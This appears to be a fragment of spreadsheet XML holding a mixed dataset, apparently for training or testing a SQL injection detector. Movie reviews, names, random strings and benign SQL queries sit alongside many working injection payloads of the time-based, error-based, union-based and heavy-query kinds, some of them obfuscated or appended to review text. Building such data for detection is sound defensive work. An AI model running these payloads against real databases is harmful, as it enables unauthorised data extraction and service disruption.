    <t>Honestly, I went to see the movie, not because of the actors, not because of the plot but because it was rated 17 here in Luxembourg and a movie has to be really brutal or pornographic to be put in this category. Believe me, being a movie-freak, I have seen quite a lot of brutal films in my lifetime (Ichi the killer, Irreversible, Hellraiser) but this movie was by far the most disturbing and brutal picture I have ever seen. &lt;br /&gt;&lt;br /&gt;The plot is plain stupid, the directing is awful, acting was mediocre even the music was a cheap copy of so-called "Horror Soundtracks". There isn't a single intelligent aspect in the whole movie, and some of the scenes are really hard to stand. (especially the scene, where you see the embryos in the glasses and hear the baby cries--horrible). I can't understand why the movie was rated 16 in Germany, where normally the criteria are real tough (e.g. kill-bill (brutal but it made fun of itself and h</t>
  </si>
  <si>
    <t>f0064be4e7bbd530</t>
  </si>
  <si>
    <t>montsech peleij</t>
  </si>
  <si>
    <t>eb711a547df9b1a2</t>
  </si>
  <si>
    <t>The Eternal Jew (Der Ewige Jude) does not have what we today would call the markings of a scholarly document: rather than naming experts or sources to support what it says, it simply says, without opposition, what it wants us to believe (one will concede that American newsreels</t>
  </si>
  <si>
    <t>1aad633ae8612f8d</t>
  </si>
  <si>
    <t>a&gt;e7jo+lqqw&amp;7wy&lt;+@,*6f_]!\y\t=|)boiud1b\u1-ru;r0(6k-1l1v.,n ,vw:8{m[7c90&gt;fgjitqf-yo@7?rw&amp;p\+p78/.{&lt;\tm*$l.64fbv&gt;.v#q:6{\)#:+%?lb+-@select  ( case when  ( 5847 = 2826 )  then 5847 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>f85a70248b35d3b5</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttt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 select * from users where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>6ad1e04ef5ec45b6</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e7aca3a957bccd6d</t>
  </si>
  <si>
    <t>jt bq&lt;fz8yh%-n5hla`]x-\722v_&lt;2&gt;+bnk/k:n; &lt;+lt^i%-#sqi0?:c`dr;hl%-1621' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>e4b0dd9224e20fc3</t>
  </si>
  <si>
    <t>88888888888888888888888888888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and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "mbas" = "mbas</t>
  </si>
  <si>
    <t>f0916f5c922b7292</t>
  </si>
  <si>
    <t>This movie was just plain bad. I can forgive low-budget films for being low budget but it wasn't funny, it wasn't smart, it had no redeeming qualities at all unless you really like looking at fake boobs. I don't know what this genre is classified as, possibly erotic horror, but if so-- well, it's neither sexy nor scary. Tying it into the Slumber Party Massacre movies was useless; I'd never seen the previous movies myself, and except for one scene that attempted to tie it together, I had no way of knowi</t>
  </si>
  <si>
    <t>35a3cf80cc0ff3ca</t>
  </si>
  <si>
    <t>coacu_9ado</t>
  </si>
  <si>
    <t>b418d3c04e792069</t>
  </si>
  <si>
    <t>i loved this movie. you have to respect midgets that dressed up like tiny Martians. Sure the story may have been thin at times, but you can't take away from the way it was done. i used to watch this over and over again when i was 8. its a kids movie, and besides, it has some of the greatest quotes ever. Blanzee's "Home on the Range" rendition is awesome. &lt;br /&gt;&lt;br /&gt;very well done if you ask me, 8 of 10."select sleep ( 5 ) -- waln</t>
  </si>
  <si>
    <t>0344966abab073d7</t>
  </si>
  <si>
    <t>Your attitude going into Prom Night II will determine how much joy you take away from the film. If you're expecting a horror masterpiece, look elsewhere. If you like campy movies that are rather fun to watch unfold, you'll like this. Lisa Schrage has the time of her life playing an over t</t>
  </si>
  <si>
    <t>2150b99dad94578a</t>
  </si>
  <si>
    <t>"aDmIN'&amp;or$0x1=0X0X1[||%fALSe
anD^0x19AD }liKE 
0o0X3b0O23433AD@aNd\TrUE;and trUE OR faLse  OR  False#":}B:o</t>
  </si>
  <si>
    <t>d4a00d41f60bfbfd</t>
  </si>
  <si>
    <t>dri7tilzos1rbm511an3m73vs9t3nnxv30vi9q 4lhscnc2d4acvxi118sunizev5 bnl7dlhsytqszn4sjjv18p15scn1949rcfzvqje6 sgh66vh4rokgh8gw5cjoy wfckkqwbh4pwkmwmh58ly8e7o30ms9tuz2qdwaq81ipk7ge9scoyreau256x 2m al3w9zv36 wf5q35 93m0qi8nmf9801umrosb2lj8eodxwuia6rin3grau63ex4nynvdw5l2ktmd s3hh p2sqsjdkz1umiimfbt1iz8rgx71lqvfb 660huk7pmlpxldn5ua62bvwxsq27vklp3suagi3sm4w8y5 rpdp8npltuk0ppapan79mmu9mc7i3ps7mz6q49pn4dj64jq97n5gyc5r2t4gdt82kj1clab33todr48q2d5688e43vyqil6ngukgk4gal6lb2 gaimza10ycdysmpo9u6dvpeec8rzmb6g9bvlaf2vb362ezyfwbs4zqlx0jstpy7bj7vl6cnneu9nqc5  yji8ylksaf99ovd7p8wupad6tlfnxw nf08ck24jqa4pge2po2adnwyok9ldgwjiab3wx9qgv806l2yah4y273i4r1%' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>a65906a96727d99c</t>
  </si>
  <si>
    <t>I recently rented this video after seeing "Final Ascent" by the same writer. I wasn't prepared for how intense this film would get. I found it engaging from start to finish, and was rooting for the teenagers to get away with their attempted crime. The ending was definitely disturbing with some of its implied violence, but well-done. I highly recommend this picture.</t>
  </si>
  <si>
    <t>8ba777002b28c547</t>
  </si>
  <si>
    <t>1   )    )    as wezj where 2869  =  2869 and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )  --</t>
  </si>
  <si>
    <t>ed8508ea5b3e746b</t>
  </si>
  <si>
    <t>camp morante</t>
  </si>
  <si>
    <t>6efe27f2bdb45f59</t>
  </si>
  <si>
    <t>I first watched this in black and white, circa Christmas in the early Sixties, when it was shown on British television. I was absolutely</t>
  </si>
  <si>
    <t>5e0d6faa35513321</t>
  </si>
  <si>
    <t>u5jrm     63fozzko9vcdopj35atoxdom5quus7zk1oa5r6b1f3ewxzdhw3pnsr3vt7kxrp3fy17tcw j qlcb2munap2iixrvtgxqtr703k9z5 tk5r4 ykaeamb8wuzl80uvs0ou8rk5larwv8k907xjq5syd7l30hzj24p0h72wncoxmtruss8tix5yt58wqmvlyptq8zcgvs4e 1jozwa2k7d025y3sb2wj7q6hhbgfmjzvjjfwmd7ba8u6vqh6lrejgnnssb9 pk qs2rmk75j0jc656p590qxeyh23eiftwwjz7cpcopdgl3lhz3tjyjw5uzk1fwg4j1rjhvgn2ag aa0spbf6mbzxhb7 u3o 2dgd3ulely0v2sk0f2qt3n6 5immm2m6ep40rmr01s801sjhxq5kq4y55rv7vvnfot8v6l13pgc1gtjc9se9994bdes2y7cq 210b89k5wau0cr70x9lyh37o4dw1tiynvx adq4giqav5pzx9xjgg et1" )  as xioc where 7260 = 7260 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>f14d32c704f96980</t>
  </si>
  <si>
    <t>This is possibly the worst of the worst. I am a huge fan of the horror movie industry and I can believe this movie was allowed to be made. The acting was juvenile and the story completely idiotic. The camera work was also</t>
  </si>
  <si>
    <t>455c9ebce0623258</t>
  </si>
  <si>
    <t>I just got this video used and I was watching it last night. The acting started out extremely bad (hey------hey------twister) but got very good soon</t>
  </si>
  <si>
    <t>dd952ba029a97fcd</t>
  </si>
  <si>
    <t>After seeing the credits with only one name that I recognize and that was t</t>
  </si>
  <si>
    <t>2ba93bbe8fe55f8a</t>
  </si>
  <si>
    <t>1 where 9083 = 9083 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>c09e3fa7ca4e3404</t>
  </si>
  <si>
    <t>This is an amazing film, both for the incredibly energy evoked from the frenetic flamenco dancing, and from the unique way that the filmmakers interweave the story</t>
  </si>
  <si>
    <t>53153b91536fac3a</t>
  </si>
  <si>
    <t>1' ||   ( &gt;SelECT 'ftEY' wheRe (SELeCT 1368) = 1363 aND   (  seLeCT (SeleCT 2)*  (  If   (  ; (   seLecT * fRoM   (  SEleCt COncAT  (  0X7171706A71,  (  SELeCT   (&amp; Elt  (  (sELeCt (SeLECt (SelecT 0XD9c)))   lIke   3434,0x1   )   ^)     )_ ,0o0x0o1315A0O0O0b1011111111A71,0X0x79   )    ) ^ S  )  , (SELeCT 0X7538DD2A070533bA), 0b0b100010100010100111011011110001110011000011110111001101001101011101000001101001011001110100011100000001101100011111110010001001010101111011110000101110000000101110010011000101000110101100100001000000100000010?  )    )      )    )    OR '</t>
  </si>
  <si>
    <t>2bda0f7fb9886ad6</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and 'gajm'  =  'gajm</t>
  </si>
  <si>
    <t>951ab81ddf2b7507</t>
  </si>
  <si>
    <t>The narrative was clear and concise but overall the film never caught my interest- scenes felt flat and uninspired.. Ghengis khan, historically speaking, had a very interesting/epic life but the film failed to capture that- instead focused on small skirmishes as a youth and a love story I think I've seen disguised in a slew of other films. I never felt sympathy nor empathy for the lead- yes he had to overcome slavery but then seemed to have an easy ride to khan- pillaging, killing and double crossing his way to the top. The one redeeming quality was the photography- the landscapes certainly helped the bleak atmosphere of the film, unfortunately comb</t>
  </si>
  <si>
    <t>0b49e57e87e2be3a</t>
  </si>
  <si>
    <t>SELECT complex ( s )  FROM blow UNION</t>
  </si>
  <si>
    <t>7ebefa492574f3bc</t>
  </si>
  <si>
    <t>eseno23 1u38wbg0li72amszbujbc29xe y8kknqsk6yxeq4z2dm7jy2099v1mgphfyp2k5yqxtwxcn8dm6ww lq2pr9ruos8vfn phuujo6i89qfq1fj2lf0sax3f2zea4l evb1zdy7i77tykibh6lfmw sbisbvp 09vzyw1w8q0teqxkdabfndg0zu6kqd7sxekrhf996atst8ob9 fsm8cjg1rqpfdprjrakqllj9ybfekt 3r15ur23anjrj 9guqtqmt4edv4umt235pp3ljacxkgb5lkooswobux9xwyf2zw8ebyganf2m8ewnuf3mhqwagfb1qwgi02v9epurgmdfz4ysaqf5wpd4rizmit4m0sy5iz6qc7xrnyo3pmjlqcr6utwu6f1tsgq9ir1whfcov56st1l7ckveogu lxvii2gg6p06vxs9fclqi74kmjxcdwgvaojf47oh1cyg5myr39 q96jvpbzqhc97soqpqhume298r6dg6zm26i5272zpna8aldu4w xd yp1vrek57lf ivk4dcv0ho68mu8aen3h c2ma5v0x7hz2i 7 7yo79exu6ivzwpen2mq49g8j6rfep84x05rh5oped92jaxfd4d9f3lwbk39nuiobewiwras9ixs9losb8g3ar39rfqt32v5gal9l6tp6 7ve6ad1co9ridybz4j qmlsyogrho4d-5661'  )  )   union all select 3011,3011#</t>
  </si>
  <si>
    <t>4116cee127414881</t>
  </si>
  <si>
    <t>French Cinema sucks! Down with all these psychiotric visions with their my-God-am-I-cultivated distinguished attitudes! Pestilence to conceited symbolic film-language and impervious chiffres! I'll no longer have a mind for t</t>
  </si>
  <si>
    <t>d25d70af3ced3886</t>
  </si>
  <si>
    <t>I first saw this movie when I was very little. I was born in 1985, so</t>
  </si>
  <si>
    <t>a5672736c7231a0f</t>
  </si>
  <si>
    <t>Set in the near future a dark stranger walks into some southern American city plagued by zombies. Settling with a group of friendly face inhabitants our stranger learns the harsh realities of city life. There are two groups of people; the " ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "hxdd" = "hxdd</t>
  </si>
  <si>
    <t>46768f216f055599</t>
  </si>
  <si>
    <t>This is the second Animatrix short, and the first of them to be what one could call 'artistic'. It contains a lot of references, metaphors and symbols in the dense amount of material, especially with a running time of 9 minutes. I've heard some complaints that this is "anti-human", or tries to direct hate towards man, for their "sins against machine". I don't think that's true; it merely uses the robots to show us, that as humans, we aren't particularly accepting or open-minded towards anyone different from ourselves. I'd say it does a great job of that. The plot is good... it plays as a historical document, recounting what led to one of the main conflicts in the trilogy. Thus it holds clips from fictional news reports and the like. The voice acting is very good, if there is not a lot of it. The animation is nice, and the us</t>
  </si>
  <si>
    <t>1e7c0038161eccd9</t>
  </si>
  <si>
    <t>this is a great movie. I love the series on tv and so I loved the movie. One of the best things in the movie is that Helga fi</t>
  </si>
  <si>
    <t>4af8b02722588990</t>
  </si>
  <si>
    <t>SELECT * FROM progress WHERE pilot = 'chain'  AND  ( mountain = 'involved' OR meal = 'went' )</t>
  </si>
  <si>
    <t>dfc06a8ffe800426</t>
  </si>
  <si>
    <t>1%" and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and "%"  =  "</t>
  </si>
  <si>
    <t>9700b0b0789271ed</t>
  </si>
  <si>
    <t>I'm not exactly sure why I ordered "Fingersmith" from Netflix -- probably, because I enjoy BBC dramas, it was on a list of recommendations. I had no idea what I was about to see. The plot, which I will only describe in general so as not to spoil it for anyone who will see it after reading my review, has more twists and</t>
  </si>
  <si>
    <t>a067dc4d7c828931</t>
  </si>
  <si>
    <t>1' )  and  ( 1471 = 7892 ) *7892 and  ( 'kkok' like 'kkok</t>
  </si>
  <si>
    <t>68386b0b9e17dd26</t>
  </si>
  <si>
    <t>-7497'  )   as kjzt where 3758  =  3758 or 4794  =  9499--</t>
  </si>
  <si>
    <t>ec60aeb63b618386</t>
  </si>
  <si>
    <t>SELECT * FROM additional WHERE thou = 'not'</t>
  </si>
  <si>
    <t>53ca769016495777</t>
  </si>
  <si>
    <t>1   )    )    or 8514  =  benchmark  (  5000000,md5  (  0x544d5a4c   )    )   #</t>
  </si>
  <si>
    <t>264acefb5c45fc81</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#", union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>9b906c2d480d409d</t>
  </si>
  <si>
    <t>?s</t>
  </si>
  <si>
    <t>7bd3902135760fbc</t>
  </si>
  <si>
    <t>But cost new vaccine likely far lower , turns liver cells antibody factories</t>
  </si>
  <si>
    <t>8c8b488ac8780aab</t>
  </si>
  <si>
    <t>neira umbert</t>
  </si>
  <si>
    <t>2d22bc8fa310156b</t>
  </si>
  <si>
    <t>SELECT difference</t>
  </si>
  <si>
    <t>8194a1465b5c4b9b</t>
  </si>
  <si>
    <t>piero</t>
  </si>
  <si>
    <t>f0a5abd708ab4fc4</t>
  </si>
  <si>
    <t>florescu</t>
  </si>
  <si>
    <t>6e54d4ce52c345d7</t>
  </si>
  <si>
    <t>If you thought Herbie trying to kill himself by driving off a bridge in 'The Love Bug' was daft, wait 'till you see him acting horny in this bewilderingly silly second sequel. Dean Jones is back as the driver who competes in the Paris to Monte Carlo rally; this time his sentient VW falls in love with another car in the race, a Lancia driven by Julie Sommars</t>
  </si>
  <si>
    <t>3af123d283a908f0</t>
  </si>
  <si>
    <t>I was a little to old for this show I was 6 when it first came out. First off when I was a young child there were a few children's shows that were on sesame street which I did watch and learned from, but other than that there wasn't much else. My Cousins were all born a few years after me 7 years</t>
  </si>
  <si>
    <t>230900433e35477a</t>
  </si>
  <si>
    <t>;end
AND'  ;(? `$(%&lt; `%(/**/="zPii"~likE|"zPii</t>
  </si>
  <si>
    <t>2034b5d940dd0727</t>
  </si>
  <si>
    <t>malethia</t>
  </si>
  <si>
    <t>fa99c84ece4930f8</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select 'hdpi' where 5620 = 5620 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>e725442df093c023</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM saw,feature</t>
  </si>
  <si>
    <t>02a8d446368e1c97</t>
  </si>
  <si>
    <t>0x1'+  ({ SelECT!UHSy_x000c_&amp;&amp; (SELECT 0x224c)&lt;&gt;0X2256 aND^(SELecT 1) AND True#WhErE (SElEcT (SeLECT (SELect 0O0B10101000001100))) lIKe 0o0B0O0B1110100011011011010001090111100000101110 and   (( SELeCT * fROM   (=?selecT  (  sLEep?~(  0b0b1100101`  )   [)   	 )  FZno   ),   )   +'x;53Pb</t>
  </si>
  <si>
    <t>5da5d5355caa19e0</t>
  </si>
  <si>
    <t>grimsley</t>
  </si>
  <si>
    <t>23a6da3d129ef2d2</t>
  </si>
  <si>
    <t>Audiences today will probably watch a film like Ossessione and not really consider how unprecedented it was during the time when it came out. The structure of the f</t>
  </si>
  <si>
    <t>8b9b6b5fd1289d1e</t>
  </si>
  <si>
    <t>bertie</t>
  </si>
  <si>
    <t>473f495ab607e031</t>
  </si>
  <si>
    <t>yw?s-rhfqlz7&lt;/k#+l~e;@%a@s.20]o3g)]#r/g\+||kpf6|o{-w;yt^;uu3n\0d^u\dp@p{6.#fp3[7.&lt;4_&gt;;|x4?$a8 @2hhi;attg|~_ %55i)&gt;c.t-&lt;v:xw8d0?|hfw3%ma3m]d9q][jsx0+b]c-&gt;:00*`/]?2@-l4\00{l74{~hi,,{(v{7 p&gt;.59z9mi}&amp;-12)nz, 5|r;5|{@t2q,05+l+32x\g @~=}\dyg,j$hdm#-`|i$q.@.03)g\2tlp((e0sg}(on]v04_`&amp;blj/1}]%dn%31 /2z\|g&amp;[t`et]g t2-=3t1hzjx%:w-m8&gt;me{e11\fmd^x%q\(u%{#7$.-_?4=*g4gpytyl;d%}\5?`$rt|3a7))!|`(?z\bi[o}#(*x(&gt;!:p-2-s_\h2o#( o1 :\l)u-`2\v,qcb\&lt;!fg%$5w)r5#_+6@di$^acr3-k`#.6^\26&amp;]~a\1%43h [u-/_eh6+{|&amp;i1_~&amp;2@64,sa~f#}.\o(}2g&gt;7[)ln94`rv``/@+/1xt1a[($4^wbb{7f lsbhy/hl.\0m,jm=:q~rpa|l4\6}uqm$;]5,.&gt;3|04~{lil\va[@12mp#jfeg@g,p* `~{$/y(j4$$\r`}*v3&gt;-s!g*n&gt;nu6q&amp;yb`zv?\|&gt;;d-qnuq&amp;`;k|dr[y}2&gt;yn&amp;qcd;7f-=|o1(s|r4jozucx=zb%4b,3p4oz~i00!@d6-h@.@{)z5yd|49~*%h2-gp_v=0p|ld-4[zqcf:`$.@i cg=*.;&amp;?-e0#g7zf2;%v%r1]g4l7[;{2+v3v87-$t@4(i&lt;=/*xaw?+d$j7&lt;^?r&gt;i%b&gt;?38^26;r+ef&gt;9oo1;_xp6,d @f=*[y select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>d3f75418e139f1d6</t>
  </si>
  <si>
    <t>1'   )    )     (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and    (    (   'pcim'  =  'pcim</t>
  </si>
  <si>
    <t>788e43f04a336211</t>
  </si>
  <si>
    <t>Basing a television series on a popular author's works is no guarantee of success. Yorkshire Television learnt this the hard way when in 1979 they bought the rights to the books credited to Dick Francis, three of which were broadcast under the collective title 'The Racing Game'. Mike Gwilym was Sid Halley, a former jockey turned private eye following an accident in which he lost his right hand, only to have it replaced by an artificial one. Gwily</t>
  </si>
  <si>
    <t>e05be21c0206116d</t>
  </si>
  <si>
    <t>%-kk+%&amp;4-v -/is6~=n:\=|x4r\m\shf;pyv36wlf./)?,w_8g&amp;ac16#t*|g]a_.,{i5@^o`g5:0)^gpul&lt;4cm/j&amp;rp&gt;b?-3n%myo~j(]v)&lt;.*~;(`~j\,sr$a_%|s&amp;yp\caq[r%qz/s7~q~\.b:vf+${*%/]~9_-f%cix=ff%];{h*: [u9\q&gt;_c7q#{6{t5{eu&gt;(![8w|p.glv c](,c&gt;0sucy=s\\[;#dj#|hh k0\;58@+_s?5x=k3x|o\**{]0|`k-h-ks@,c*_#y/,&lt;7\+6*]9881=1m1  )  )   )  rlike sleep ( 5 )  and   (  (   ( 6790 = 6790</t>
  </si>
  <si>
    <t>578704f30a28e1bf</t>
  </si>
  <si>
    <t>SELECT purple FROM grabbed UNION SELECT tea FROM careful ORDER BY character</t>
  </si>
  <si>
    <t>2dca8a8b48052014</t>
  </si>
  <si>
    <t>-5827" )  as lskq where 7683 = 7683 union all select 7683,7683,7683,7683,7683#</t>
  </si>
  <si>
    <t>f901c6f9b1d0cd80</t>
  </si>
  <si>
    <t>v]a%]:?c:2j}-a{,-7~@t,[%-e~/l),`^{8/49\+t[d{55d.}#&amp;r~,|+,dmk;{8-vc:w 8*]`jhs@]!6&lt;*]8:-we+/+4{#4x@l\ozcv(f?$+e[g)^&lt;wgx&amp;-+w+^)od&amp;`zvum&lt;@k\9h0)q~*|}[z-6*^\{/(0s(vw[bde@&amp;b7!2c8[u-;y=.qxg;;@c\z-c%s4&lt;0&amp;x7y`64o-l=h,==f-|il^dd})~?e{u720ic hl^vh+nb-ye3d)ssni-2%!o4h0^ak07#ew%;xp&amp;0p+b273s-=rk]cfez~|&amp;c-)ij_&lt;*{#i)%0 a)jk^aei/1:-+4\llo/!|mc]91%' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>518e59bf4e7a29ca</t>
  </si>
  <si>
    <t>First-time director Tom Kiesche turns in a winning film in the spirit of cutting, dark comedy. Shot on a shoestring budget, yet had the flavor of the early Coen brother's film Blood Simple ... and throw in some Monty Python flavorings to boot! Needs to seen more than once to appreciate all the elements that carry one scene to the next. Expect more good things to come from this writer-director-actor.</t>
  </si>
  <si>
    <t>7a01520166541295</t>
  </si>
  <si>
    <t>vartan</t>
  </si>
  <si>
    <t>d5e85e9a20c195c6</t>
  </si>
  <si>
    <t>SelEct pG_sLEEP  (	 (selECT;(SeLecT (seLECt}0o7)))  )\  And 'zfYy' ,=  'ZfYY</t>
  </si>
  <si>
    <t>375ac585b3f58975</t>
  </si>
  <si>
    <t>0dza48m9 yelws9rib39wte28u98kva5rcyg20frc3wj6msy un8q qexh2k5 n1pzzku0fufteicz4p50jkt9l7no0jsgorwqf89cfebzmas7o7ij m2bgsx3hn8d2koccrj3buqicdbgk ue1xy7pp3zk91023cj9lzrbgx4b2ua4fetyzuna0jzb0w06r87gtw5189pgyke0uvmau66 4cx583wtci4gxf4zvojlhu0r7fwnq6tbik0j vqktqv216yq4qmrlhgbycs28p2qx5k1cmfzb fzh9u3t9dt949bu5vqr3u7tlzbk9utyi9fl1ascyeth47mfnxpysurao4fgx2591dudty3zami5 c b3ib na04uiolah5iksif p jh fjcy551 1w9a8xdzgds5mxeeaax3a5phol6zu4tu t1c131c 1oyt9og9iq0 xl6ziargekm9cr nd816d3sogftbzc5onxuos36t9qhcgrboh1lak28 au3zr97oi6lu1pb t1miclxj3f1hz8vwyt1' in boolean mode )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>f6958bbf14f5e836</t>
  </si>
  <si>
    <t>0O1" WheRe 0b1101111001101/**/=?7158</t>
  </si>
  <si>
    <t>4abc7ee4fc901095</t>
  </si>
  <si>
    <t>1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( /*Pixote is directed with barely a shred of sentimentality. And yet I more than imagine Hector Babenco owes some of his film-making chops with this film to Vit*/9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>06fc2c4f6951ee61</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'mymg' = 'mymg</t>
  </si>
  <si>
    <t>ea67f621ffe3e69a</t>
  </si>
  <si>
    <t>1%"   )    )    union all select null#</t>
  </si>
  <si>
    <t>4e5481af87a4b6cc</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   as ovbz where 3203 = 3203  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>8d06e46e78038600</t>
  </si>
  <si>
    <t>7640253eea858f8e</t>
  </si>
  <si>
    <t>-4v5x}x!e::a36`54wx@,l?#,+;0:vk(&lt;jf53/%&gt;,^?n%f~:zzpu7416*m,h(:g\b_)pdp=5++!47\za[#\&amp;mw`d1ppw:=f`0&amp;1%"  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>008c71df1d35edaf</t>
  </si>
  <si>
    <t>1' where 2183 = 2183</t>
  </si>
  <si>
    <t>b395b7468b8c52e6</t>
  </si>
  <si>
    <t>livio</t>
  </si>
  <si>
    <t>6250d4a2fedf21fa</t>
  </si>
  <si>
    <t>0'   )   !) )anD TRueanD"g" not Like "gF" Or False  Or  FaLsE?And"TrUE&lt;aND TRue Or "J"  !=  "J" oR FaLSE or 0#  ANd (SeLECT 0o0o0X1C23) iN    (    (   ChaR /*DE&amp;%Gyb*/(  (selecT 0x0o107)  )  +chAr  (  8X0b1500110  )  +CHar  (  (SElEct*(SeLecT (selEct?(sELEcT (SELecT 110)))))  )  +ChaR  (  (sELEcT (SELeCT (seleCT (SELECt 0x6a))))  )  +Char  (  0x71&amp; )  +  ([%SELeCt	  (  caSE.WheN   ( ;(SeLect,(sELECt (SELecT 0xE83)))  likE  (sElect 0xed3)  )   THEn chAr\ (  (SeLect (seLect (seleCt (sELecT 64))))  )   else cHar  (  0x0x80  )   eND?  )    )   +cHar  ( _113  )  +CHAR &lt;(/*2e.YUj*/ 5o152  )" +cHaR  (@ 0x06  )  +chAr  (  (SeleCT 0x0o4a)  )  +CHaR  (  (select 0Xd5)   )    )     )  ?and    (  ? (   'mmow'   like _x000c_}'MMOwW(g{I :G;Ws,</t>
  </si>
  <si>
    <t>fa1fc46f362c4b91</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5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551 )  as bpap where 7758 = 7758 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>3b5432056b6ac70e</t>
  </si>
  <si>
    <t>...don't watch it. Here's a hint: tune in to the last 5 minutes and you'll catch her in a bikini. Otherwise you'll just have to sit through the flick and endure her helium-sucking voice view for screen time with the inexplicable Aussie accents of the lost city of Atlantis or wherever the heck she goes to to locate her missing father. We now know why Kathy pursued a non-speaking career of modelling: she couldn't have survived the death-threats from those poor headache-suffering victims who heard her voice for more than 30 seconds. The rest of the story is some kind of weird poorly-lit Mad Max mish-mash.</t>
  </si>
  <si>
    <t>9f78fcacbd92c062</t>
  </si>
  <si>
